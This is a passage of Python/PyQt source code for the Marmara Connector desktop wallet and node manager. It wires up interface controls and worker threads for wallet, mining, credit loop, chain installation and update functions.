self.cpu_core_set_button.clicked.connect(self.setmining_cpu_core)\n self.mining_button.clicked.connect(self.toggle_mining)\n self.getinfo_refresh_button.clicked.connect(self.refresh_side_panel)\n self.walletsummary_hide_button.clicked.connect(self.toggle_walletsummary)\n self.cup_lineEdit.setValidator(self.validator)\n self.cup_lineEdit.textChanged.connect(self.calculate_amount)\n self.cup_lineEdit.returnPressed.connect(self.send_coins_to_team)\n self.support_pushButton.clicked.connect(self.send_coins_to_team)\n self.fontsize_plus_button.clicked.connect(self.increase_fontsize)\n self.fontsize_minus_button.clicked.connect(self.decrease_fontsize)\n self.discord_button.clicked.connect(self.open_discord)\n self.youtube_button.clicked.connect(self.open_youtube)\n self.website_button.clicked.connect(self.open_website)\n # Chain page\n self.stopchain_button.clicked.connect(self.stop_chain)\n self.addaddress_page_button.clicked.connect(self.get_address_page)\n self.addresses_tableWidget.cellClicked.connect(self.addresstable_itemcontext)\n self.privkey_page_button.clicked.connect(self.see_privkey_page)\n self.hide_address_checkBox.clicked.connect(self.hide_addresses)\n self.download_blocks_button.clicked.connect(self.download_blocks)\n self.refresh_walletaddresses_button.clicked.connect(self.getaddresses)\n 
self.check_fork_button.clicked.connect(self.check_fork)\n self.check_fork_button.setHidden(True)\n self.update_chain_button.clicked.connect(self.update_chain_latest)\n self.latest_chain_version = None\n self.chain_versiyon_tag = None\n self.update_chain_textBrowser.setVisible(False)\n self.debug_button.clicked.connect(self.toggle_textbrowser)\n self.rescan_checkBox.setVisible(False)\n self.reindex_checkBox.setVisible(False)\n self.startchain_button.setVisible(False)\n self.startchain_button.clicked.connect(self.start_chain_settings)\n # - add address page ----\n self.newaddress_button.clicked.connect(self.get_new_address)\n self.address_seed_button.clicked.connect(self.convertpassphrase)\n self.addresspage_back_button.clicked.connect(self.back_chain_widget_index)\n self.new_address_frame.setEnabled(False)\n self.add_with_seed_radiobutton.clicked.connect(self.change_address_frame_visibility)\n self.add_without_seed_radiobutton.clicked.connect(self.change_address_frame_visibility)\n # - private key page ----\n self.importprivkey_button.clicked.connect(self.importprivkey)\n self.privatekeypage_back_button.clicked.connect(self.back_chain_widget_index)\n # Wallet page\n self.myCCActivatedAddress = None\n self.addressamount_refresh_button.clicked.connect(self.get_address_amounts)\n self.lock_button.clicked.connect(self.marmaralock_amount)\n self.unlock_button.clicked.connect(self.marmaraunlock_amount)\n self.refresh_loopinfo_button.setVisible(False)\n self.refresh_loopinfo_button.clicked.connect(self.get_wallet_loopinfo)\n # Coin send-receive page\n self.contacts_address_comboBox.currentTextChanged.connect(self.get_selected_contact_address)\n self.qrcode_button.clicked.connect(self.create_currentaddress_qrcode)\n self.coinsend_button.clicked.connect(self.sendtoaddress)\n self.transactions_startdate_dateTimeEdit.setMinimumDateTime(QDateTime(datetime.fromtimestamp(1579278200)))\n self.transactions_startdate_dateTimeEdit.setMaximumDateTime(QDateTime.currentDateTime())\n self.transactions_startdate_dateTimeEdit.setDateTime(QDateTime.currentDateTime().addDays(-1))\n self.transactions_endtdate_dateTimeEdit.setMinimumDateTime(QDateTime(datetime.fromtimestamp(1579278200)))\n self.transactions_endtdate_dateTimeEdit.setDateTime(QDateTime.currentDateTime())\n self.transaction_search_button.clicked.connect(self.getaddresstxids)\n self.transactions_tableWidget.cellClicked.connect(self.transaction_itemcontext)\n # Credit Loops page-----------------\n self.creditloop_tabWidget.currentChanged.connect(self.credit_tab_changed)\n # ---- Received Loop Requests page ----\n self.looprequest_search_button.clicked.connect(self.search_marmarareceivelist)\n self.request_date_checkBox.clicked.connect(self.set_request_date_state)\n self.request_dateTimeEdit.setDateTime(QDateTime.currentDateTime())\n self.contactpk_otherpk_looprequest_comboBox.currentTextChanged.connect(self.get_selected_contact_pukey)\n # -----Make credit Loop Request\n self.contactpk_makeloop_comboBox.currentTextChanged.connect(self.get_selected_contact_loop_pubkey)\n self.contactpk_transferrequest_comboBox.currentTextChanged.connect(self.get_selected_contact_transfer_pubkey)\n self.make_credit_loop_matures_dateTimeEdit.setMinimumDateTime(QDateTime.currentDateTime())\n self.send_loop_request_button.clicked.connect(self.marmarareceive)\n self.send_transfer_request_button.clicked.connect(self.marmararecieve_transfer)\n self.looprequest_otherpk_radioButton.clicked.connect(self.change_visibilty_looprequestpubkey)\n 
self.looprequest_currentpk_radioButton.clicked.connect(self.change_visibilty_looprequestpubkey)\n self.change_visibilty_looprequestpubkey()\n # -----Total Credit Loops page -----\n self.activeloops_search_button.clicked.connect(self.search_active_loops)\n self.holderloops_search_button.clicked.connect(self.marmaraholderloops)\n self.activeloops_tableWidget.cellClicked.connect(self.activeloop_itemcontext)\n self.transferableloops_tableWidget.cellClicked.connect(self.transferableloops_itemcontext)\n # ---- Loop Queries page --\n self.lq_pubkey_search_button.clicked.connect(self.search_any_pubkey_loops)\n self.lq_txid_search_button.clicked.connect(self.search_loop_txid)\n\n # Contacts Page\n self.addcontact_button.clicked.connect(self.add_contact)\n self.updatecontact_button.clicked.connect(self.update_contact)\n self.deletecontact_button.clicked.connect(self.delete_contact)\n self.contacts_tableWidget.cellClicked.connect(self.get_contact_info)\n self.clear_contact_button.clicked.connect(self.clear_contacts_line_edit)\n self.contacts_tableWidget.horizontalHeader().sectionClicked.connect(self.clear_contacts_line_edit)\n self.contact_editing_row = \"\"\n # Stats Page\n self.stats_refresh_pushButton.clicked.connect(self.get_marmara_stats)\n self.stats_calculate_pushButton.setEnabled(False)\n self.stats_amount_in_activated_lineEdit.setEnabled(False)\n self.stats_amount_in_loops_lineEdit.setEnabled(False)\n self.stats_calculate_pushButton.clicked.connect(self.calculate_estimated_stake)\n self.earning_stop_dateTimeEdit.setMaximumDateTime(QDateTime.currentDateTime())\n self.earning_stop_dateTimeEdit.setDateTime(QDateTime.currentDateTime())\n self.earning_start_dateTimeEdit.setMaximumDateTime(QDateTime.currentDateTime())\n self.earning_start_dateTimeEdit.setDateTime(QDateTime.currentDateTime().addDays(-1))\n self.earnings_search_button.clicked.connect(self.get_wallet_earnings)\n self.export_earning_table_button.clicked.connect(self.pay_for_export)\n # Market Page\n self.exchange_market_request_button.clicked.connect(self.get_mcl_exchange_market)\n self.mcl_amount_lineEdit.textEdited.connect(self.calculate_usd_price)\n self.usd_amount_lineEdit.textEdited.connect(self.calculate_mcl_price)\n self.mcl_exchange_market_result = None\n self.mcl_exchange_ticker_result = None\n self.market_fiat_comboBox.addItems(['USD', 'TRY', 'BTC', 'EUR', 'RUB'])\n self.market_fiat_comboBox.currentTextChanged.connect(self.market_fiat_changed)\n\n # Thread setup\n self.thread_marmarad_path = QThread()\n self.thread_autoinstall = QThread()\n self.thread_getinfo = QThread()\n self.thread_getchain = QThread()\n self.thread_stopchain = QThread()\n self.thread_getaddresses = QThread()\n self.thread_setpubkey = QThread()\n self.thread_getnewaddress = QThread()\n self.thread_convertpassphrase = QThread()\n self.thread_importprivkey = QThread()\n self.thread_address_privkey = QThread()\n self.thread_seeprivkey = QThread()\n self.thread_marmaralock = QThread()\n self.thread_marmaraunlock = QThread()\n self.thread_sendrawtransaction = QThread()\n self.thread_marmarareceivelist = QThread()\n self.thread_sendtoaddress = QThread()\n self.thread_marmaracreditloop = QThread()\n self.thread_marmarareceive = QThread()\n self.thread_setgenerate = QThread()\n self.thread_sidepanel = QThread()\n self.thread_marmarareceive_transfer = QThread()\n self.thread_marmarainfo = QThread()\n self.thread_getloops = QThread()\n self.thread_marmaraissue = QThread()\n self.thread_marmaratransfer = QThread()\n self.thread_getaddresstxids = QThread()\n 
self.thread_sendtoteam = QThread()\n self.thread_get_address_amounts = QThread()\n self.thread_extract_bootstrap = QThread()\n self.thread_api_exchange_request = QThread()\n self.thread_api_stats_request = QThread()\n self.thread_marmarholderloop = QThread()\n self.thread_getblock = QThread()\n self.thread_api_chain_update_check = QThread()\n self.thread_chain_update = QThread()\n self.thread_fetch_params = QThread()\n self.thread_earnings = QThread()\n self.thread_api_app_ver = QThread()\n\n # Loading Gif\n # --------------------------------------------------\n self.loading = LoadingScreen()\n # --------------------------------------------------\n # Check for update\n self.check_app_version()\n # ---------------------------------------------------\n\n def set_tooltip_texts(self):\n QToolTip.setFont(QFont('SansSerif', 10))\n self.copyaddress_button.setToolTip(self.tr(\"Copy address\"))\n self.copypubkey_button.setToolTip(self.tr(\"Copy pubkey\"))\n self.support_pushButton.setToolTip(self.tr(\"Gift Marmara Core Team cups of coffee\"))\n self.download_blocks_button.setToolTip(self.tr(\"Download Blocks bootstrap\"))\n self.stats_refresh_pushButton.setToolTip(self.tr(\"can be refreshed once in a minute\"))\n self.exchange_market_request_button.setToolTip(self.tr(\"can be refreshed once in 20 seconds\"))\n self.fontsize_plus_button.setToolTip(self.tr(\"Increase font size\"))\n self.fontsize_minus_button.setToolTip(self.tr(\"Decrease font size\"))\n self.youtube_button.setToolTip('Youtube MARMARA')\n self.discord_button.setToolTip('Discord MARMARA')\n self.website_button.setToolTip(\"marmara.io\")\n self.debug_button.setToolTip('Debug')\n self.export_earning_table_button.setToolTip(self.tr('Export to CSV'))\n self.reindex_checkBox.setToolTip(self.tr('starts from beginning and re-indexes currently '\n 'synced blockchain data'))\n self.rescan_checkBox.setToolTip(self.tr('starts scanning wallet data in blockchain data'))\n self.walletsummary_hide_button.setToolTip(self.tr('Hide'))\n self.connections_warning_label.setToolTip(self.tr('Check your Network Connection'))\n\n def center_ui(self):\n qr = self.frameGeometry()\n top_point = QDesktopWidget().availableGeometry().top()\n center_point = QDesktopWidget().availableGeometry().center().x()\n qr.moveTopLeft(QtCore.QPoint(center_point - (qr.width() / 2), top_point))\n self.move(qr.topLeft())\n\n def get_default_fontsize(self):\n fontsize_conf = configuration.ApplicationConfig().get_value('USER', 'fontsize')\n if fontsize_conf:\n self.default_fontsize = int(fontsize_conf)\n\n def get_balance_hide(self):\n if configuration.ApplicationConfig().get_value('USER', 'balance_hide') == 'True':\n self.toggle_walletsummary()\n\n def get_initial_style_settings(self):\n style_conf = configuration.ApplicationConfig().get_value('USER', 'style')\n if style_conf:\n self.set_stylesheet(style_conf)\n else:\n self.set_icon_color('black')\n\n @pyqtSlot()\n def show_style_themes(self):\n font = QFont()\n font.setPointSize(self.default_fontsize)\n themeDialog = QDialog(self)\n themeDialog.setWindowTitle(self.tr(\"Choose a style\"))\n themeDialog.setFont(font)\n themeDialog.setMinimumSize(255, 100)\n apply_button = QDialogButtonBox(QDialogButtonBox.Apply)\n apply_button.setFont(font)\n self.style_comboBox = QtWidgets.QComboBox()\n self.style_comboBox.setFont(font)\n\n themeDialog.layout = QVBoxLayout()\n themeDialog.layout.addWidget(self.style_comboBox)\n themeDialog.layout.addWidget(apply_button)\n themeDialog.setLayout(themeDialog.layout)\n\n entries = 
os.listdir(qtguistyle.style_path)\n entries.sort()\n for item in entries:\n self.style_comboBox.addItem(item.strip('.qss'))\n self.style_comboBox.addItem('light')\n apply_button.clicked.connect(self.get_theme_selection)\n apply_button.clicked.connect(themeDialog.close)\n themeDialog.exec_()\n\n @pyqtSlot()\n def get_theme_selection(self):\n data = self.style_comboBox.currentText()\n if data:\n configuration.ApplicationConfig().set_key_value('USER', 'style', data)\n self.set_stylesheet(data)\n\n def set_stylesheet(self, data):\n if data == 'light':\n self.selected_stylesheet = \"\"\n self.set_icon_color('black')\n else:\n self.selected_stylesheet = self.get_style(data + '.qss')\n self.set_icon_color('#eff0f1')\n self.setStyleSheet(self.selected_stylesheet)\n self.set_font_size(self.default_fontsize)\n\n @pyqtSlot()\n def check_app_version(self):\n self.worker_api_app_ver = marmarachain_rpc.ApiWorker()\n self.worker_api_app_ver.moveToThread(self.thread_api_app_ver)\n self.worker_api_app_ver.finished.connect(self.thread_api_app_ver.quit)\n self.thread_api_app_ver.started.connect(self.worker_api_app_ver.app_ver_check)\n self.thread_api_app_ver.start()\n self.worker_api_app_ver.out_list.connect(self.check_app_version_listout)\n self.worker_api_app_ver.out_err.connect(self.check_app_version_errtout)\n\n @pyqtSlot(list)\n def check_app_version_listout(self, out):\n latest_app_tag = out[0]\n latest_app_version = out[1]\n base_version = configuration.version\n if base_version != latest_app_tag:\n QMessageBox.information(self, self.tr('Software Update Available'),\n self.tr('A new update is available.
    Follow the link ')\n + \"\" + self.tr(\"here\") + '')\n else:\n self.bottom_info(self.tr('No Update Available Current App version is ') + base_version)\n\n @pyqtSlot(str)\n def check_app_version_errtout(self, out):\n if out == 'Connection Error':\n self.custom_message(self.tr('Connection Error'), self.tr('Check your internet Connection '), 'information',\n QMessageBox.Information)\n\n def read_lang_setting(self):\n language = configuration.ApplicationConfig().get_value('USER', 'lang')\n if language:\n entries = os.listdir(configuration.configuration_path + '/language')\n for item in entries:\n if item.strip('.qm') == language:\n self.change_lang(language)\n\n @pyqtSlot()\n def show_languages(self):\n font = QFont()\n font.setPointSize(self.default_fontsize)\n languageDialog = QDialog(self)\n languageDialog.setMinimumSize(300, 100)\n languageDialog.setWindowTitle(self.tr(\"Choose a language\"))\n languageDialog.setFont(font)\n apply_button = QDialogButtonBox(QDialogButtonBox.Apply)\n apply_button.setFont(font)\n self.lang_comboBox = QtWidgets.QComboBox()\n self.lang_comboBox.setFont(font)\n\n languageDialog.layout = QVBoxLayout()\n languageDialog.layout.addWidget(self.lang_comboBox)\n languageDialog.layout.addWidget(apply_button)\n languageDialog.setLayout(languageDialog.layout)\n\n entries = os.listdir(configuration.configuration_path + '/language')\n entries.sort()\n\n for item in entries:\n self.lang_comboBox.addItem(item.strip('.qm'))\n self.lang_comboBox.setItemIcon(entries.index(item), QIcon(\n self.icon_path + \"/lang_icons\" + \"/\" + item.strip('.qm') + \".png\"))\n apply_button.clicked.connect(self.get_lang_selection)\n apply_button.clicked.connect(languageDialog.close)\n languageDialog.exec_()\n\n @pyqtSlot()\n def get_lang_selection(self):\n data = self.lang_comboBox.currentText()\n if data:\n self.change_lang(data)\n configuration.ApplicationConfig().set_key_value('USER', 'lang', data)\n else:\n QtWidgets.QApplication.instance().removeTranslator(self.trans)\n\n def change_lang(self, data):\n self.trans.load(configuration.configuration_path + '/language/' + data + '.qm')\n QtWidgets.QApplication.instance().installTranslator(self.trans)\n self.retranslateUi(MarmaraMain)\n\n def show_about(self):\n QMessageBox.about(self,\n self.tr(\"About Marmara Connector\"),\n self.tr(\"This is a software written to carry out Marmarachain node operations \"\n \"on a local or remote machine.\" + \"
    Version info: \") + configuration.version\n )\n\n def custom_message(self, title, content, message_type, icon=None, detailed_text=None):\n \"\"\" custom_message(str, str, str: message_type = {information, question}, icon = {QMessageBox.Question,\n QMessageBox.Information, QMessageBox.Warning, QMessageBox.Critical}, str) \"\"\"\n font = QFont()\n font.setPointSize(self.default_fontsize)\n messagebox = QMessageBox()\n messagebox.setStyleSheet(self.selected_stylesheet)\n messagebox.setWindowTitle(title)\n messagebox.setText(content)\n messagebox.setTextInteractionFlags(QtCore.Qt.TextSelectableByMouse)\n messagebox.setDetailedText(detailed_text)\n messagebox.setFont(font)\n btn_yes = None\n btn_no = None\n btn_ok = None\n\n if message_type == \"information\":\n if icon:\n messagebox.setIcon(icon)\n messagebox.setStandardButtons(QMessageBox.Ok)\n btn_ok = messagebox.button(QMessageBox.Ok)\n btn_ok.setText(self.tr(\"Ok\"))\n btn_ok.setFont(font)\n if message_type == \"question\":\n if icon:\n messagebox.setIcon(icon)\n messagebox.setStandardButtons(QMessageBox.Yes | QMessageBox.No)\n btn_yes = messagebox.button(QMessageBox.Yes)\n btn_yes.setText(self.tr(\"Yes\"))\n btn_yes.setFont(font)\n btn_no = messagebox.button(QMessageBox.No)\n btn_no.setText(self.tr(\"No\"))\n btn_no.setFont(font)\n messagebox.exec_()\n if messagebox.clickedButton() == btn_yes:\n return QMessageBox.Yes\n if messagebox.clickedButton() == btn_no:\n return QMessageBox.No\n if messagebox.clickedButton() == btn_ok:\n return QMessageBox.Ok\n\n def host_selection(self):\n self.main_tab.setCurrentIndex(0)\n self.login_stackedWidget.setCurrentIndex(0)\n self.home_button.setVisible(False)\n self.login_message_label.clear()\n self.chain_status = False\n self.chain_synced = False\n self.host_name_label.clear()\n\n def logout_host(self):\n self.current_pubkey_value.clear()\n self.currentaddress_value.clear()\n self.pubkey_status = False\n self.myCCActivatedAddress = None\n self.addresses_tableWidget.setRowCount(0)\n self.addresses_privkey_tableWidget.setRowCount(0)\n self.transactions_tableWidget.setRowCount(0)\n self.loop_request_tableWidget.setRowCount(0)\n self.transferrequests_tableWidget.setRowCount(0)\n self.activeloops_tableWidget.setRowCount(0)\n self.transferableloops_tableWidget.setRowCount(0)\n self.earning_stats_tableWidget.setRowCount(0)\n self.chain_version_label.clear()\n self.latest_chain_version = None\n self.chain_versiyon_tag = None\n self.clear_amount_values()\n self.host_selection()\n\n def clear_amount_values(self):\n self.normal_amount_value.clear()\n self.activated_amount_value.clear()\n self.wallet_total_normal_value.clear()\n self.wallet_total_activated_value.clear()\n self.totalnormal_value_label.clear()\n self.totalactivated_value_label.clear()\n self.total_issuer_loop_amount_label_value.clear()\n self.activeloops_pending_number_value_label.clear()\n self.closedloops_total_amount_value_label.clear()\n self.closedloops_total_number_value_label.clear()\n self.activeloops_total_amount_value_label.clear()\n self.numberof_total_activeloops_label_value.clear()\n self.my_stats_normal_label_value.clear()\n self.my_stats_activated_label_value.clear()\n self.my_stats_inloops_label_value.clear()\n self.total_transferrable_loop_amount_label_value.clear()\n self.numberof_transferrable_loop_amount_label_value.clear()\n self.holderloops_closed_amount_label_value.clear()\n self.holderloops_closed_number_label_value.clear()\n self.activated_earning_value.clear()\n self.normal_earning_value.clear()\n 
self.total_earning_value.clear()\n\n def local_selection(self):\n marmarachain_rpc.set_connection_local()\n logging.info('is local connection: ' + str(marmarachain_rpc.is_local))\n self.check_marmara_path()\n self.download_blocks_button.show()\n self.host_name_label.setText(self.tr('LOCAL'))\n\n def remote_selection(self):\n self.login_stackedWidget.setCurrentIndex(1)\n self.get_server_combobox_names()\n self.home_button.setVisible(True)\n marmarachain_rpc.set_connection_remote()\n marmarachain_rpc.set_sshclient(None)\n logging.info('is local connection: ' + str(marmarachain_rpc.is_local))\n self.serverpw_lineEdit.clear()\n self.download_blocks_button.hide()\n if self.server_comboBox.count() != 0:\n self.serveredit_button.setEnabled(True)\n self.connect_button.setEnabled(True)\n else:\n self.connect_button.setEnabled(False)\n self.serveredit_button.setEnabled(False)\n\n @pyqtSlot()\n def server_connect(self):\n server_list = configuration.ServerSettings().read_file()\n selected_server_info = server_list[self.server_comboBox.currentIndex()]\n selected_server_info = selected_server_info.split(\",\")\n if not self.ssh_port_lineEdit.text():\n self.ssh_port_lineEdit.setText('22')\n remote_connection.set_server_connection(ip=selected_server_info[2], username=selected_server_info[1],\n pw=self.serverpw_lineEdit.text(),\n ssh_port=self.ssh_port_lineEdit.text())\n validate = remote_connection.check_server_connection()\n if validate == 'error':\n self.login_page_info(self.tr(\"Authentication or Connection Error\"))\n else:\n self.check_marmara_path()\n marmarachain_rpc.set_sshclient(validate)\n self.host_name_label.setText(self.tr('Remote: ') + self.server_comboBox.currentText())\n\n @pyqtSlot()\n def open_debug_console(self):\n QMessageBox.information(self,\n self.tr(\"Debug Console\"),\n self.tr(\"Under development\"))\n\n @pyqtSlot()\n def open_log_file(self):\n text_path = configuration.log_file_path\n webbrowser.open_new(text_path)\n\n @pyqtSlot()\n def open_chain_log_file(self):\n operating_system = platform.system()\n debug_log_path = ''\n if operating_system == 'Darwin':\n debug_log_path = os.environ['HOME'] + '/Library/Application Support/Komodo/MCL'\n elif operating_system == 'Linux':\n debug_log_path = os.environ['HOME'] + '/.komodo/MCL'\n elif operating_system == 'Win64' or operating_system == 'Windows':\n debug_log_path = '%s/komodo/MCL' % os.environ['APPDATA']\n debug_log_file = str(debug_log_path + '/' + 'debug.log')\n webbrowser.open_new(debug_log_file)\n\n @pyqtSlot(int)\n def mcl_tab_changed(self, index):\n if index == 4:\n self.update_contact_tablewidget()\n if index == 2:\n self.get_contact_names_addresses()\n if index == 3:\n self.creditloop_tabWidget.setCurrentIndex(0)\n if index == 6:\n self.update_exchange_market_combobox()\n\n @pyqtSlot(int)\n def credit_tab_changed(self, index):\n if index == 1:\n self.get_contact_names_pubkeys()\n\n def worker_thread(self, thread, worker, method=None, params=None, worker_output=None, execute=None):\n if self.chain_status:\n self.start_animation()\n if method:\n worker.set_method(method)\n if params:\n worker.set_params(params)\n worker.moveToThread(thread)\n worker.finished.connect(thread.quit)\n worker.finished.connect(self.stop_animation)\n if execute is None:\n thread.started.connect(worker.do_execute_rpc)\n if execute == 'refresh_sidepanel':\n thread.started.connect(worker.refresh_sidepanel)\n if execute == 'get_addresses':\n thread.started.connect(worker.get_addresses)\n worker.walletlist_out.connect(worker_output)\n if execute == 
'setgenerate':\n thread.started.connect(worker.setgenerate)\n if execute == 'get_balances':\n thread.started.connect(worker.get_balances)\n if execute == 'txids_detail':\n thread.started.connect(worker.txids_detail)\n if execute == 'active_loops_details':\n thread.started.connect(worker.active_loops_details)\n if execute == 'holder_loop_detail':\n thread.started.connect(worker.holder_loop_detail)\n if execute == 'check_fork_api':\n thread.started.connect(worker.check_fork_api)\n if execute == 'wallet_earnings':\n thread.started.connect(worker.calc_wallet_earnings)\n worker.output.connect(self.earnings_output_info)\n thread.start(priority=4)\n if worker_output and execute != 'get_addresses':\n worker.command_out.connect(worker_output)\n return worker\n else:\n logging.info(\"Marmarachain is not started\")\n self.bottom_info(self.tr(\"Marmarachain is not started\"))\n\n @pyqtSlot()\n def start_animation(self):\n self.loading.startAnimation()\n\n @pyqtSlot()\n def stop_animation(self):\n self.loading.stopAnimation()\n\n def check_marmara_path(self):\n self.worker_check_marmara_path = marmarachain_rpc.RpcHandler()\n self.worker_check_marmara_path.moveToThread(self.thread_marmarad_path)\n self.worker_check_marmara_path.finished.connect(self.thread_marmarad_path.quit)\n self.thread_marmarad_path.started.connect(self.worker_check_marmara_path.check_marmara_path)\n self.thread_marmarad_path.start(priority=4)\n self.worker_check_marmara_path.output.connect(self.check_marmara_path_output)\n\n @pyqtSlot(str)\n def check_marmara_path_output(self, output):\n if output == 'get marmarad path':\n self.login_page_info(self.tr('Getting marmara chain path from config file'))\n logging.info('Getting marmara chain path from config file')\n if str(output).split('=')[0] == 'marmarad_path':\n self.login_page_info(self.tr('marmara path from configuration file = ') + str(output).split('=')[1])\n logging.info('marmara path from configuration file = ' + str(output).split('=')[1])\n if output == 'verifiying path':\n self.login_page_info(self.tr('Verifiying the Chain location '))\n logging.info('Verifiying the Chain location ')\n if output == 'marmarad found.':\n self.login_page_info(self.tr('Chain location verified.'))\n logging.info('Chain location verified.')\n self.chain_init()\n if output == 'need to install mcl':\n message_box = self.custom_message(self.tr('Installing Marmarachain'),\n self.tr('Marmarachain is not installed. 
Would you like to install it?'),\n \"question\", QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n logging.info('Auto-install.')\n self.main_tab.setCurrentIndex(2)\n if marmarachain_rpc.is_local:\n self.sudo_password_lineEdit.setVisible(True)\n if platform.system() == 'Windows':\n self.sudo_password_lineEdit.setVisible(False)\n else:\n self.sudo_password_lineEdit.setVisible(False)\n if message_box == QMessageBox.No:\n self.main_tab.setCurrentIndex(0)\n\n @pyqtSlot()\n def start_autoinstall(self):\n self.worker_autoinstall = marmarachain_rpc.Autoinstall()\n if marmarachain_rpc.is_local:\n if platform.system() == 'Windows':\n start_install = True\n else:\n if self.sudo_password_lineEdit.text():\n self.worker_autoinstall.set_password(self.sudo_password_lineEdit.text())\n start_install = True\n self.sudo_password_lineEdit.clear()\n else:\n message_box = self.custom_message(self.tr('Auto-installation does not begin'), self.tr(\n 'You need to write a password that has admin privileges'), self.tr(\"information\"),\n QMessageBox.Information)\n\n start_install = False\n else:\n start_install = True\n if start_install:\n self.start_install_button.setEnabled(False)\n self.install_progress_textBrowser.append(self.tr('Starting Install ...'))\n logging.info('Starting Install')\n\n self.worker_autoinstall.moveToThread(self.thread_autoinstall)\n self.worker_autoinstall.finished.connect(self.thread_autoinstall.quit)\n self.thread_autoinstall.started.connect(self.worker_autoinstall.start_install)\n self.thread_autoinstall.start()\n self.worker_autoinstall.out_text.connect(self.start_autoinstall_textout)\n self.worker_autoinstall.progress.connect(self.start_autoinstall_progress)\n\n @pyqtSlot(str)\n def start_autoinstall_textout(self, output):\n if str(output).find('Something Went Wrong') > -1:\n message_box = self.custom_message(self.tr('Installation not completed correctly'),\n self.tr(output),\n 'information', QMessageBox.Information)\n self.install_progress_textBrowser.append(output)\n\n @pyqtSlot(int)\n def start_autoinstall_progress(self, val):\n self.install_progressBar.setValue(val)\n if 96 <= val < 100:\n self.install_progressBar.setValue(100)\n message_box = self.custom_message(self.tr('Installation Completed'), self.tr('Starting Marmarachain'),\n 'information', QMessageBox.Information)\n if message_box == QMessageBox.Ok:\n self.main_tab.setCurrentIndex(1)\n self.mcl_tab.setCurrentIndex(0)\n self.check_marmara_path()\n if val > 100:\n self.install_progressBar.setValue(0)\n self.start_install_button.setEnabled(True)\n message_box = self.custom_message(self.tr('Installation not completed correctly'),\n self.tr('Wrong password input. 
Please install again'),\n 'information', QMessageBox.Information)\n\n @pyqtSlot(str)\n def bottom_info(self, info):\n self.bottom_message_label.setText(info)\n\n def bottom_err_info(self, err_msg):\n try:\n result = json.loads(err_msg)\n self.bottom_info(result['message'])\n logging.error(result['message'])\n except Exception:\n result = str(err_msg).splitlines()\n if str(err_msg).find('error message:') != -1:\n index = result.index('error message:') + 1\n self.bottom_info(result[index])\n logging.error(result[index])\n else:\n err_result = \"\"\n for line in str(err_msg).splitlines():\n err_result = err_result + ' ' + str(line)\n logging.error(err_result)\n self.bottom_info(err_result)\n if str(err_msg) == \"(7, 'Failed to connect to 127.0.0.1 port 33825: Connection refused')\" or \\\n str(err_msg).find(\"error: couldn't connect to server: unknown (code -1)\") != -1:\n if self.chain_status:\n self.custom_message(self.tr('Chain is not Working'),\n self.tr('Make sure the marmara chain is running!'), 'information',\n QMessageBox.Warning)\n self.chain_status = False\n self.chainstatus_label_value.setPixmap(self.inactive_icon_pixmap)\n\n def login_page_info(self, info):\n self.login_message_label.setText(info)\n\n # ---------------------------------------\n # Chain initialization\n # ---------------------------------------\n @pyqtSlot()\n def chain_init(self):\n self.main_tab.setCurrentIndex(1)\n self.mcl_tab.setCurrentIndex(0)\n self.chain_stackedWidget.setCurrentIndex(0)\n self.check_chain_update()\n logging.info('chain_status ' + str(self.chain_status))\n self.bottom_info(self.tr('chain_status ' + str(self.chain_status)))\n time.sleep(0.1)\n zcash_status = marmarachain_rpc.check_zcashparams()\n if zcash_status[0] == 0:\n if not self.chain_status:\n logging.info('Checking marmarachain')\n self.bottom_info(self.tr('Checking marmarachain'))\n marmara_pid = marmarachain_rpc.mcl_chain_status()\n if len(marmara_pid[0]) > 0:\n self.bottom_info(self.tr('marmarachain has pid'))\n logging.info('marmarachain has pid')\n self.is_chain_ready()\n if len(marmara_pid[0]) == 0:\n logging.info('marmarachain is not running')\n self.bottom_info(self.tr('marmarachain is not running'))\n self.enable_start_button()\n\n if zcash_status[0] == 1:\n message_content = \"\"\n corrupted_files = \"\"\n if type(zcash_status[1]) is str:\n message_content = self.tr('ZcashParams folder missing')\n else:\n if len(zcash_status[1]) > 0:\n for item in zcash_status[1]:\n corrupted_files = corrupted_files + item.strip('/') + ' '\n message_content = message_content + self.tr(' incomplete files: ') + corrupted_files + '\\n'\n if len(zcash_status[2]) > 0:\n missing_files = \"\"\n for item in zcash_status[2]:\n missing_files = missing_files + item.strip('/') + ', '\n message_content = message_content + self.tr(' missing files: ') + missing_files\n message_box = self.custom_message('Incomplete ZcashParams',\n message_content + \"\\n\" + self.tr(' Do you want to install'),\n 'question', QMessageBox.Warning)\n if message_box == QMessageBox.Yes:\n self.run_fetch_params(zcash_status[1])\n if message_box == QMessageBox.No: # Abort\n self.logout_host()\n\n def run_fetch_params(self, zc_file=None):\n self.start_animation()\n self.worker_fetch_params = marmarachain_rpc.Autoinstall()\n if zc_file:\n self.worker_fetch_params.set_input_list(zc_file)\n self.worker_fetch_params.moveToThread(self.thread_fetch_params)\n self.worker_fetch_params.finished.connect(self.thread_fetch_params.quit)\n 
self.worker_fetch_params.finished.connect(self.stop_animation)\n self.worker_fetch_params.finished.connect(self.fetch_params_install_finished)\n self.thread_fetch_params.started.connect(self.worker_fetch_params.fetch_params_install)\n self.thread_fetch_params.start()\n self.update_chain_textBrowser.setVisible(True)\n self.worker_fetch_params.out_text.connect(self.fetch_params_install_result)\n\n def fetch_params_install_result(self, output):\n self.update_chain_textBrowser.append(output)\n\n def fetch_params_install_finished(self):\n message_box = self.custom_message(self.tr('ZcashParams Finished'), self.tr('Starting Chain'), 'information')\n if message_box == QMessageBox.Ok:\n self.chain_init()\n\n def is_chain_ready(self):\n self.bottom_info(self.tr('Checking if marmarachain is ready for rpc'))\n logging.info('Checking if marmarachain is ready for rpc')\n self.start_animation()\n self.worker_getchain = marmarachain_rpc.RpcHandler() # worker setting\n self.worker_getchain.moveToThread(self.thread_getchain) # move object in to thread\n self.worker_getchain.finished.connect(self.thread_getchain.quit) # when finished close thread\n self.worker_getchain.finished.connect(self.stop_animation) # when finished close animation\n self.thread_getchain.started.connect(self.worker_getchain.is_chain_ready) # executing respective worker func.\n self.thread_getchain.start() # start thread\n self.worker_getchain.command_out.connect(self.chain_ready_result) # getting results and connecting to socket\n self.worker_getchain.walletlist_out.connect(self.set_getaddresses_result)\n\n @pyqtSlot(tuple)\n def chain_ready_result(self, result_out):\n if result_out[0]:\n logging.info('chain is ready')\n self.bottom_info(self.tr('chain ready'))\n result = json.loads(result_out[0])\n self.chain_status = True\n self.check_fork_button.setHidden(False)\n self.chainstatus_label_value.setPixmap(self.active_icon_pixmap)\n if result.get('version'):\n self.set_getinfo_result(result)\n 